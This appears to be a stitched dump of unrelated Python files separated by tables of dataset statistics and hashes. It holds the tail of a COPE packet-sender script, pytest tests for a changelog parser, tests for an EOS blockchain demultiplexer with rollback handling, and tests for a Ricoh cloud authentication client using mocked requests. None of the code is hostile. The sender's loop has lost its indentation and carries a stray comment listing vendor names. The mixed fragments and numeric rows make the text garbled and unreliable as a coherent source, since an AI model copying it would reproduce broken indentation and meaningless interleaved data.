00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00"
# coding_utils.print_hex("Payload to send\n", COPE_payload)
print "Starting sender"
start_time = time.clock()
packets_to_send = 2
for i in range(packets_to_send):
cope_packet.send_COPE_packet(self.src_ip, self.dest_ip, self.dest_hwaddr, COPE_payload, self.interface)
# Apply CISCO, Motorola, Alcatel Lucent, Nokia, Qualcomm, Huawei,
end_time = time.clock()
print "Time took: %.20f" % (end_time - start_time)
f1.close()
print "%d COPE packets sent" % (packets_to_send)
def main():
    """Parse optional argv overrides and launch a single COPE sender thread.

    Positional arguments: argv[1] interface, argv[2] destination IP,
    argv[3] destination MAC.  Missing arguments keep the module defaults.
    """
    global interface, dest_ip, dest_hwaddr
    argv = sys.argv
    if len(argv) >= 2:
        interface = argv[1]
    if len(argv) >= 3:
        dest_ip = argv[2]
    if len(argv) >= 4:
        dest_hwaddr = argv[3]
    source_ip = network_utils.get_first_IPAddr()
    sender_thread = COPE_sender("COPE sender", source_ip, dest_ip,
                                dest_hwaddr, interface)
    # Non-daemon: keep the process alive until the send loop completes.
    sender_thread.daemon = False
    sender_thread.start()


if __name__ == '__main__':
    main()
| 83.942857
| 3,887
| 0.711198
| 1,236
| 5,876
| 3.317961
| 0.080906
| 0.705194
| 1.055596
| 1.407462
| 0.747135
| 0.719824
| 0.719824
| 0.705194
| 0.705194
| 0.705194
| 0
| 0.184412
| 0.087304
| 5,876
| 70
| 3,888
| 83.942857
| 0.580272
| 0.725664
| 0
| 0
| 0
| 0
| 0.065584
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.133333
| null | null | 0.066667
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
877f072f9a12bdd37d7632c169cb719c2c71f387
| 4,049
|
py
|
Python
|
test/unit/extra/changelog/logic/test_extract_changelog_items.py
|
novopl/peltak
|
7c8ac44f994d923091a534870960fdae1e15e95e
|
[
"Apache-2.0"
] | 6
|
2015-09-10T13:20:34.000Z
|
2021-02-15T08:10:27.000Z
|
test/unit/extra/changelog/logic/test_extract_changelog_items.py
|
novopl/peltak
|
7c8ac44f994d923091a534870960fdae1e15e95e
|
[
"Apache-2.0"
] | 41
|
2015-09-09T12:44:55.000Z
|
2021-06-01T23:25:56.000Z
|
test/unit/extra/changelog/logic/test_extract_changelog_items.py
|
novopl/peltak
|
7c8ac44f994d923091a534870960fdae1e15e95e
|
[
"Apache-2.0"
] | null | null | null |
# pylint: disable=missing-docstring
import pytest
from peltak.extra.changelog import logic
from peltak.extra.changelog.types import ChangelogTag
from peltak import testing
@pytest.mark.parametrize('header,tag', [
    ('Features', 'feature'),
    ('Changes', 'change'),
    ('Fixes', 'fix'),
])
@testing.patch_pelconf({})
def test_detects_each_tag(header, tag):
    """A single tagged multi-line entry is collected under its header."""
    lines = [
        '({tag}) This is my item'.format(tag=tag),
        'and it has multiple lines',
    ]
    all_tags = [
        ChangelogTag(header='Features', tag='feature'),
        ChangelogTag(header='Changes', tag='change'),
        ChangelogTag(header='Fixes', tag='fix'),
    ]
    extracted = logic.extract_changelog_items('\n'.join(lines), tags=all_tags)
    assert len(extracted[header]) == 1
    assert extracted[header][0] == 'This is my item and it has multiple lines'
@pytest.mark.parametrize('header,tag', [
    ('Features', 'feature'),
    ('Changes', 'change'),
    ('Fixes', 'fix'),
])
@testing.patch_pelconf({})
def test_supports_dense_descriptions(header, tag):
    """Back-to-back tagged entries with no blank separator both parse."""
    lines = [
        '({tag}) This is my item'.format(tag=tag),
        'and it has multiple lines',
        '({tag}) This is my second item'.format(tag=tag),
    ]
    all_tags = [
        ChangelogTag(header='Features', tag='feature'),
        ChangelogTag(header='Changes', tag='change'),
        ChangelogTag(header='Fixes', tag='fix'),
    ]
    extracted = logic.extract_changelog_items('\n'.join(lines), tags=all_tags)
    assert len(extracted[header]) == 2
    assert extracted[header][0] == 'This is my item and it has multiple lines'
    assert extracted[header][1] == 'This is my second item'
@pytest.mark.parametrize('header,tag', [
    ('Features', 'feature'),
    ('Changes', 'change'),
    ('Fixes', 'fix'),
])
@testing.patch_pelconf({})
def test_supports_loose_descriptions(header, tag):
    """Blank lines before and between tagged entries are tolerated."""
    lines = [
        '',
        '({tag}) This is my item'.format(tag=tag),
        'and it has multiple lines',
        '',
        '({tag}) This is my second item'.format(tag=tag),
    ]
    all_tags = [
        ChangelogTag(header='Features', tag='feature'),
        ChangelogTag(header='Changes', tag='change'),
        ChangelogTag(header='Fixes', tag='fix'),
    ]
    extracted = logic.extract_changelog_items('\n'.join(lines), tags=all_tags)
    assert len(extracted[header]) == 2
    assert extracted[header][0] == 'This is my item and it has multiple lines'
    assert extracted[header][1] == 'This is my second item'
@testing.patch_pelconf({})
def test_supports_all_tags_used_together():
    """Entries for every tag in one description land under their own headers."""
    description = (
        '(fix) This is my fix\n'
        'and it has multiple lines\n'
        '\n'
        '(change) This is my change\n'
        '(feature) This is my feature'
    )
    extracted = logic.extract_changelog_items(description, tags=[
        ChangelogTag(header='Features', tag='feature'),
        ChangelogTag(header='Changes', tag='change'),
        ChangelogTag(header='Fixes', tag='fix'),
    ])
    for header, expected in [
        ('Features', 'This is my feature'),
        ('Changes', 'This is my change'),
        ('Fixes', 'This is my fix and it has multiple lines'),
    ]:
        assert len(extracted[header]) == 1
        assert extracted[header][0] == expected
@testing.patch_pelconf({})
def test_ignores_non_tagged_text():
    """Free text around tagged entries is dropped from the results."""
    # The 'gnored' typo is original fixture text, preserved byte-for-byte.
    description = '\n'.join((
        'This is some text that should be gnored',
        '(feature) This is my feature',
        '',
        'This also should be ignored',
    ))
    extracted = logic.extract_changelog_items(description, tags=[
        ChangelogTag(header='Features', tag='feature'),
    ])
    assert len(extracted['Features']) == 1
    assert extracted['Features'][0] == 'This is my feature'
@testing.patch_pelconf({})
def test_support_continuation_tags():
    """A (_more) continuation joins its text to the previous item with a newline."""
    description = '\n'.join((
        '(feature) This is my item',
        '',
        '(_more) and it has a continuation tag.',
    ))
    extracted = logic.extract_changelog_items(description, tags=[
        ChangelogTag(header='Features', tag='feature'),
    ])
    assert len(extracted['Features']) == 1
    assert extracted['Features'][0] == 'This is my item\nand it has a continuation tag.'
| 29.34058
| 84
| 0.611509
| 498
| 4,049
| 4.891566
| 0.150602
| 0.051724
| 0.065681
| 0.039409
| 0.811166
| 0.754105
| 0.740148
| 0.740148
| 0.740148
| 0.713875
| 0
| 0.005702
| 0.220301
| 4,049
| 137
| 85
| 29.554745
| 0.765917
| 0.00815
| 0
| 0.798165
| 0
| 0
| 0.289736
| 0
| 0
| 0
| 0
| 0
| 0.165138
| 1
| 0.055046
| false
| 0
| 0.036697
| 0
| 0.091743
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
87a90597fb6ddd76a5c46f1b0496556057c532df
| 19,293
|
py
|
Python
|
tests/test_pydemux.py
|
blockrepublictech/py-demux-eos
|
7877bc960dcdea966b4d5a4bbe6392bd8c2bc253
|
[
"Apache-2.0"
] | 4
|
2018-12-07T20:50:56.000Z
|
2019-02-21T14:37:29.000Z
|
tests/test_pydemux.py
|
blockrepublictech/py-demux-eos
|
7877bc960dcdea966b4d5a4bbe6392bd8c2bc253
|
[
"Apache-2.0"
] | 2
|
2018-12-11T03:21:31.000Z
|
2018-12-11T05:41:48.000Z
|
tests/test_pydemux.py
|
blockrepublictech/py-demux-eos
|
7877bc960dcdea966b4d5a4bbe6392bd8c2bc253
|
[
"Apache-2.0"
] | null | null | null |
# py-demux-eos - Deterministic event-sourced state and side effect handling for blockchain applications
# Copyright (C) 2018 BlockRepublic Pty Ltd
# Licenced under the Apache 2.0 Licence
import unittest
import pytest
from unittest.mock import Mock, patch, call
from demuxeos import Demux
from demuxeos.exceptions import UnknownBlockError
from tests.utils import (block_1, fake_block1, fake_block2, block_9999,
block_10000, fake_block_10000)
from collections import defaultdict
# Tests for py-demux
class TestPyDemux(unittest.TestCase):
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
def test_block_with_no_transactions(self, mock_get_info_head_block, mock_get_block):
"""
Ensure we can process a block with no transactions251
"""
mock_get_info_head_block.return_value = {'head_block_num': 99999999999}
# get_block returns manual block_1
mock_get_block.return_value = block_1
# mock callback functions
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# process the mock block_1
d.process_block(1)
# assertions
mock_get_block.assert_called_once()
mock_get_block.assert_called_with(1)
mock_start_block.assert_called_once()
assert mock_action.call_count == 0
mock_commit_block.assert_called_once()
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
def test_single_mock_block_processing(self, mock_get_info_head_block, mock_get_block): #put get_info first
"""
Tests block processing on a mocked block
"""
mock_get_info_head_block.return_value = {'head_block_num': 99999999999}
# get_block returns fake_block1
mock_get_block.return_value = fake_block1
# mock callback functions
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# process the mock block fake_block1
d.process_block(100)
# assertions
mock_get_block.assert_called_once()
mock_get_block.assert_called_with(100)
mock_start_block.assert_called_once()
assert mock_action.call_count == 1
mock_commit_block.assert_called_once()
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
def test_multiple_mock_block_processing(self, mock_get_info_head_block, mock_get_block):
"""
Ensures multiple block are processed given a start and end block
"""
mock_get_info_head_block.return_value = {'head_block_num': 99999999999}
# get block iterates through blocks each time it is called
mock_get_block.side_effect = [fake_block1, fake_block2]
# mock callback functions
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# process the mock blocks 9999 to 10000
d.process_blocks(100, 102)
# assertions
assert mock_get_block.call_count == 2
assert mock_get_block.call_args_list == [call(100), call(101)]
assert mock_start_block.call_count == 2
assert mock_action.call_count == 3
assert mock_commit_block.call_count == 2
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
def test_cannot_process_past_head_block(self, mock_get_info_head_block, mock_get_block):
"""
Tests when the end block is more than one block greater than the head block, an assertion is raised and no block is processed
"""
with pytest.raises(AssertionError) as excinfo:
mock_get_info_head_block.return_value = {'head_block_num': 99}
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# attempts to process the mock blocks 9999998 to 10000000
d.process_blocks(100, 101)
mock_get_block.assert_not_called()
mock_start_block.assert_not_called()
mock_action.assert_not_called()
mock_commit_block.assert_not_called()
assert 'ERROR: End block is past head block.' in str(excinfo.value)
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
def test_cannot_process_past_last_irreversible_block(self, mock_get_info_irr_block, mock_get_block):
"""
Tests when the end block is more than one block greater than the last irreversible block, an assertion is raised and no block is processed
"""
with pytest.raises(AssertionError) as excinfo:
mock_get_info_irr_block.return_value = {'last_irreversible_block_num': 99}
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# attempts to process the mock blocks 9999998 to 10000000
d.process_blocks(100, 101, irreversible_only=True)
mock_get_block.assert_not_called()
mock_start_block.assert_not_called()
mock_action.assert_not_called()
mock_commit_block.assert_not_called()
assert 'ERROR: End block is past last irreversible block.' in str(excinfo.value)
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
@patch('demuxeos.time.sleep')
def test_continuous_block_processing(self, mock_sleep,
mock_get_info_head_block,
mock_get_block):
"""
Test that continuous polling the block chain for new blocks works correctly
"""
# Internal implementation of get_info() which keeps head_block as var,
mock_get_info_head_block.side_effect = [{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900}]
# get block iterates through blocks each time it is called
mock_get_block.side_effect = [block_9999, block_10000]
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# process the mock blocks 9999
with pytest.raises(StopIteration) as excinfo:
d.process_blocks(9999)
# assertions
assert mock_get_block.call_count == 2
assert mock_get_block.call_args_list == [call(9999), call(10000)]
assert mock_start_block.call_count == 2
assert mock_action.call_count == 28
assert mock_commit_block.call_count == 2
assert mock_sleep.call_count == 1
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
@patch('demuxeos.time.sleep')
def test_irreversible_blocks_only(self, mock_sleep,
mock_get_info_head_block,
mock_get_block):
"""
Test that rollbacks are dealt with correctly when continously polling the block chain
"""
mock_get_info_head_block.side_effect = [{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900}]
# get block iterates through blocks each time it is called
mock_get_block.side_effect = [block_9999, block_10000]
# mock callback functions
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# process the mock blocks 9999
with pytest.raises(StopIteration) as excinfo:
d.process_blocks(9999)
# assertions
assert mock_get_block.call_count == 2
assert mock_get_block.call_args_list == [call(9999), call(10000)]
assert mock_start_block.call_count == 2
assert mock_action.call_count == 28
assert mock_commit_block.call_count == 2
assert mock_sleep.call_count == 1
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
@patch('demuxeos.time.sleep')
def test_unknown_block_causes_a_rollback(self, mock_sleep,
mock_get_info_head_block,
mock_get_block):
"""
Test that continuous polling the block chain for new blocks works correctly
"""
# Internal implementation of get_info() which keeps head_block as var,
mock_get_info_head_block.side_effect = [{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900}]
# get block iterates through blocks each time it is called
mock_get_block.side_effect = [block_9999, UnknownBlockError(), block_9999]
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# process the mock blocks 9999
with pytest.raises(StopIteration) as excinfo:
d.process_blocks(9999)
# assertions
assert mock_get_block.call_count == 3
assert mock_get_block.call_args_list == [call(9999), call(10000), call(9901)]
assert mock_start_block.call_count == 2
assert mock_action.call_count == 28
assert mock_commit_block.call_count == 2
assert mock_sleep.call_count == 1
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
@patch('demuxeos.time.sleep')
def test_decrease_in_head_block_causes_rollback(self, mock_sleep,
                                                mock_get_info_head_block,
                                                mock_get_block):
    """A head block number that goes backwards (9999 -> 9901) fires the
    registered rollback callback and re-fetches from the new head."""
    def info(head):
        # One chain-info snapshot as returned by the mocked _get_info().
        return {'head_block_num': head, 'last_irreversible_block_num': 9900}

    # Head sits at 9999 for four polls, then *drops* to 9901.
    mock_get_info_head_block.side_effect = (
        [info(9999) for _ in range(4)] + [info(9901) for _ in range(3)])
    mock_get_block.side_effect = [block_9999, block_9999]
    mock_start_block = Mock()
    mock_action = Mock()
    mock_commit_block = Mock()
    mock_rollback = Mock()
    # Wire the mock callbacks, including the rollback handler under test.
    demux = Demux(start_block_fn=mock_start_block,
                  commit_block_fn=mock_commit_block,
                  rollback_fn=mock_rollback)
    demux.register_action(mock_action)
    # Processing stops with StopIteration once the side_effect lists run dry.
    with pytest.raises(StopIteration):
        demux.process_blocks(9999)
    assert mock_rollback.call_count == 1
    assert mock_get_block.call_count == 2
    assert mock_get_block.call_args_list == [call(9999), call(9901)]
    assert mock_start_block.call_count == 2
    assert mock_action.call_count == 28
    assert mock_commit_block.call_count == 2
    assert mock_sleep.call_count == 1
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
@patch('demuxeos.time.sleep')
def test_mismatched_previous_ids_is_a_rollback(self, mock_sleep,
                                               mock_get_info_head_block,
                                               mock_get_block):
    """A fetched block whose previous-id does not chain onto the prior
    block (fake_block_10000) fires the rollback callback."""
    def info(head):
        # One chain-info snapshot as returned by the mocked _get_info().
        return {'head_block_num': head, 'last_irreversible_block_num': 9900}

    # Head sits at 9999 for four polls, then advances to 10000.
    mock_get_info_head_block.side_effect = (
        [info(9999) for _ in range(4)] + [info(10000) for _ in range(3)])
    # The second block deliberately fails the previous-id continuity check.
    mock_get_block.side_effect = [block_9999, fake_block_10000]
    mock_start_block = Mock()
    mock_action = Mock()
    mock_commit_block = Mock()
    mock_rollback = Mock()
    # Wire the mock callbacks, including the rollback handler under test.
    demux = Demux(start_block_fn=mock_start_block,
                  commit_block_fn=mock_commit_block,
                  rollback_fn=mock_rollback)
    demux.register_action(mock_action)
    # Processing stops with StopIteration once the side_effect lists run dry.
    with pytest.raises(StopIteration):
        demux.process_blocks(9999)
    assert mock_rollback.call_count == 1
    assert mock_get_block.call_count == 2
    assert mock_get_block.call_args_list == [call(9999), call(10000)]
    assert mock_start_block.call_count == 2
    assert mock_action.call_count == 28
    assert mock_commit_block.call_count == 2
    assert mock_sleep.call_count == 1
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
@patch('demuxeos.time.sleep')
def test_mismatched_irreverible_blocks_asserts(self, mock_sleep,
                                               mock_get_info_head_block,
                                               mock_get_block):
    """When a rollback would have to rewrite an already-irreversible block
    (the irreversible block itself mismatches), processing aborts with an
    AssertionError rather than continuing."""
    def info(head):
        # Here last_irreversible equals the starting head, so a rollback
        # collides with the irreversible boundary.
        return {'head_block_num': head, 'last_irreversible_block_num': 9999}

    # Head sits at 9999 for four polls, then advances to 10000.
    mock_get_info_head_block.side_effect = (
        [info(9999) for _ in range(4)] + [info(10000) for _ in range(3)])
    # Mismatched block, then a bogus re-fetch result (block_1).
    mock_get_block.side_effect = [block_9999, fake_block_10000, block_1]
    mock_start_block = Mock()
    mock_action = Mock()
    mock_commit_block = Mock()
    mock_rollback = Mock()
    # Wire the mock callbacks, including the rollback handler.
    demux = Demux(start_block_fn=mock_start_block,
                  commit_block_fn=mock_commit_block,
                  rollback_fn=mock_rollback)
    demux.register_action(mock_action)
    # Unlike the other rollback tests, this one must die with AssertionError.
    with pytest.raises(AssertionError):
        demux.process_blocks(9999)
    assert mock_rollback.call_count == 1
    assert mock_get_block.call_count == 3
    assert mock_get_block.call_args_list == [call(9999), call(10000), call(9999)]
    assert mock_start_block.call_count == 2
    assert mock_action.call_count == 28
    assert mock_commit_block.call_count == 2
    assert mock_sleep.call_count == 1
| 47.992537
| 146
| 0.611517
| 2,270
| 19,293
| 4.811013
| 0.074449
| 0.062265
| 0.048347
| 0.090102
| 0.901108
| 0.893508
| 0.892226
| 0.889387
| 0.889387
| 0.884351
| 0
| 0.051472
| 0.313222
| 19,293
| 401
| 147
| 48.112219
| 0.772755
| 0.150417
| 0
| 0.821561
| 0
| 0
| 0.132492
| 0.068826
| 0
| 0
| 0
| 0
| 0.252788
| 1
| 0.040892
| false
| 0
| 0.026022
| 0
| 0.070632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
87d4e2c45a7ccfa2de27bbc6547430cb08f7ab98
| 5,643
|
py
|
Python
|
tests/test_auth/test_client.py
|
ricohapi/ricoh-cloud-sdk-python
|
740d778c678e6097e3c35478545cbf283276a7ee
|
[
"MIT"
] | 2
|
2018-08-14T21:01:07.000Z
|
2019-12-16T07:21:09.000Z
|
tests/test_auth/test_client.py
|
ricohapi/ricoh-cloud-sdk-python
|
740d778c678e6097e3c35478545cbf283276a7ee
|
[
"MIT"
] | null | null | null |
tests/test_auth/test_client.py
|
ricohapi/ricoh-cloud-sdk-python
|
740d778c678e6097e3c35478545cbf283276a7ee
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Ricoh Co., Ltd. All Rights Reserved.
import json
from unittest import TestCase
import mock
import pytest
from requests.exceptions import RequestException
from ricohcloudsdk.auth.client import AuthClient
ENDPOINT = 'https://auth.api.ricoh/v1/token'
SCOPE = 'ips.api.ricoh/v1/detect_faces ips.api.ricoh/v1/compare_faces ips.api.ricoh/v1/detect_humans'
class TestInit(TestCase):
    """Constructor argument validation for AuthClient.

    AuthClient takes two positional credentials (client id and client
    secret); supplying fewer raises TypeError from the signature itself.
    """

    def test_ok(self):
        # Both credentials supplied: construction succeeds.
        AuthClient('client_id_test', 'client_secret_test')

    def test_param_err1(self):
        # No arguments: both required parameters missing.
        with pytest.raises(TypeError):
            AuthClient()

    def test_param_err2(self):
        # Only one argument: the client secret is missing.
        with pytest.raises(TypeError):
            AuthClient('a')
class TestSession(TestCase):
    """Behaviour of AuthClient.session() with requests.post mocked out."""

    def setUp(self):
        # Fresh client plus the canonical token response for every test.
        self.target = AuthClient('client_id_test', 'client_secret_test')
        self._expected = {
            'access_token': 'atoken',
            'api_key': 'api_key',
            'expires_in': 3600,
            'scope': SCOPE,
            'token_type': 'Bearer'
        }

    def _assert_posted_once(self, req):
        # Every session() call must POST the same grant payload exactly once.
        payload = {
            'grant_type': 'client_credentials',
            'scope': SCOPE
        }
        req.assert_called_once_with(
            ENDPOINT, auth=self.target._AuthClient__bauth, data=payload)

    @mock.patch('requests.post')
    def test_ok(self, req):
        # A well-formed JSON token response is returned verbatim.
        req.return_value.text = json.dumps(self._expected)
        assert self.target.session(AuthClient.SCOPES['vrs']) == self._expected
        self._assert_posted_once(req)

    @mock.patch('requests.post')
    def test_json_exception(self, req):
        # A body that is not JSON surfaces as ValueError.
        req.return_value.text = 'not json'
        with pytest.raises(ValueError):
            self.target.session(AuthClient.SCOPES['vrs'])
        self._assert_posted_once(req)

    @mock.patch('requests.post')
    def test_missing_expire_in(self, req):
        # A response lacking 'expires_in' is rejected.
        req.return_value.text = json.dumps(
            {
                'access_token': 'atoken',
                'api_key': 'api_key'
            }
        )
        with pytest.raises(ValueError):
            self.target.session(AuthClient.SCOPES['vrs'])
        self._assert_posted_once(req)

    @mock.patch('requests.post')
    def test_missing_keys(self, req):
        # A response with none of the expected keys is rejected.
        req.return_value.text = json.dumps(
            {
                'test': 'atoken'
            }
        )
        with pytest.raises(ValueError):
            self.target.session(AuthClient.SCOPES['vrs'])
        self._assert_posted_once(req)

    @mock.patch('requests.post')
    def test_requests_exception(self, req):
        # Network-level failures propagate unchanged to the caller.
        req.side_effect = RequestException
        with pytest.raises(RequestException):
            self.target.session(AuthClient.SCOPES['vrs'])
        self._assert_posted_once(req)
class TestGetAccessToken(TestCase):
    """Behaviour of AuthClient.get_access_token() with requests.post mocked."""

    def setUp(self):
        # Fresh client plus the canonical token response for every test.
        self.target = AuthClient('cid', 'cpass')
        self._expected = {
            'access_token': 'atoken',
            'api_key': 'api_key',
            'expires_in': 3600,
            'scope': SCOPE,
            'token_type': 'Bearer'
        }

    @mock.patch('requests.post')
    def test_ok(self, req):
        # A token cached by session() is returned even after the transport
        # stops producing usable responses.
        req.return_value.text = json.dumps(self._expected)
        self.target.session(AuthClient.SCOPES['vrs'])
        req.return_value.text = None
        assert self.target.get_access_token() == 'atoken'

    @mock.patch('requests.post')
    def test_r_ok(self, req):
        # Without a prior session() the token is fetched on demand.
        req.return_value.text = json.dumps(self._expected)
        assert self.target.get_access_token() == 'atoken'

    @mock.patch('requests.post')
    def test_json_exception(self, req):
        # A non-JSON response surfaces as ValueError.
        req.return_value.text = 'not json'
        with pytest.raises(ValueError):
            self.target.get_access_token()

    @mock.patch('requests.post')
    def test_exception(self, req):
        # Network-level failures propagate unchanged to the caller.
        req.side_effect = RequestException
        with pytest.raises(RequestException):
            self.target.get_access_token()
class TestGetAPIKey(TestCase):
    """Behaviour of AuthClient.get_api_key() with requests.post mocked.

    Bug fix: the original test_json_exception and test_exception called
    get_access_token() — a copy-paste from TestGetAccessToken — so the
    error paths of get_api_key() were never exercised. They now call
    get_api_key(), the method this class is named for.
    """

    def setUp(self):
        # Fresh client plus the canonical token response for every test.
        self.target = AuthClient('cid', 'cpass')
        self.__expected = {
            'access_token': 'atoken',
            'api_key': 'api_key',
            'expires_in': 3600,
            'scope': SCOPE,
            'token_type': 'Bearer'
        }

    @mock.patch('requests.post')
    def test_ok(self, req):
        # An api_key cached by session() is returned even after the
        # transport stops producing usable responses.
        req.return_value.text = json.dumps(self.__expected)
        self.target.session(AuthClient.SCOPES['vrs'])
        req.return_value.text = None
        ret = self.target.get_api_key()
        assert ret == 'api_key'

    @mock.patch('requests.post')
    def test_r_ok(self, req):
        # Without a prior session() the api_key is fetched on demand.
        req.return_value.text = json.dumps(self.__expected)
        ret = self.target.get_api_key()
        assert ret == 'api_key'

    @mock.patch('requests.post')
    def test_json_exception(self, req):
        # Was get_access_token() in the original — now exercises the
        # method under test. Assumes get_api_key() shares the same
        # JSON-parsing ValueError path as get_access_token() — TODO confirm
        # against AuthClient's implementation.
        req.return_value.text = 'not json'
        with pytest.raises(ValueError):
            self.target.get_api_key()

    @mock.patch('requests.post')
    def test_exception(self, req):
        # Was get_access_token() in the original — now exercises the
        # method under test; transport failures must propagate unchanged.
        req.side_effect = RequestException
        with pytest.raises(RequestException):
            self.target.get_api_key()
